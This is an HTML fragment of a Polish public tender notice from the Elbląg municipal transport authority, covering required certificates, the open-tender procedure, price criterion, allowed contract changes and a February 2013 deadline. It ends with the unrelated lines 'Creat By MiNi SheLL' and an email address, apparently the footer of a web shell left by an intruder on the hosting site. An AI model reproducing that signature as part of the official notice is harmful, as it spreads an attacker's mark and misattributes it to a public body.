<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o spełnianiu przez oferowane usługi wymagań określonych przez Zamawiającego w SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następującym zakresie:
1.Wynagrodzenie w przypadku:
a) urzędowych zmian w obowiązujących przepisach podatkowych, w tym zmiany stawek podatku VAT,
b) przejmowania lub ustawiania przez Zamawiającego wiat przystankowych oraz modernizacji lub budowy peronów, przystanków powodujących zmianę ich ilości,
c) wyłączenia z ruchu przystanków w wyniku prowadzonych prac remontowych 
lub budowlanych .
2. Terminu  realizacji umowy pod warunkiem:
a) działania siły wyższej (np. klęski żywiołowe) mające bezpośredni wpływ 
na terminowość wykonywanych prac,
b) wystąpienia okoliczności, których strony nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
c) wystąpienia awarii nie zawinionej przez Wykonawcę,
d) działania osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zkm.elblag.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Komunikacji Miejskiej w Elblągu spółka z ograniczoną odpowiedzialnością
82-300 Elbląg,  ul. Browarna 90.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2013 godzina 10:00, miejsce: Zarząd Komunikacji Miejskiej w Elblągu spółka z ograniczoną odpowiedzialnością
82-300 Elbląg,  ul. Browarna 90, pok. Nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com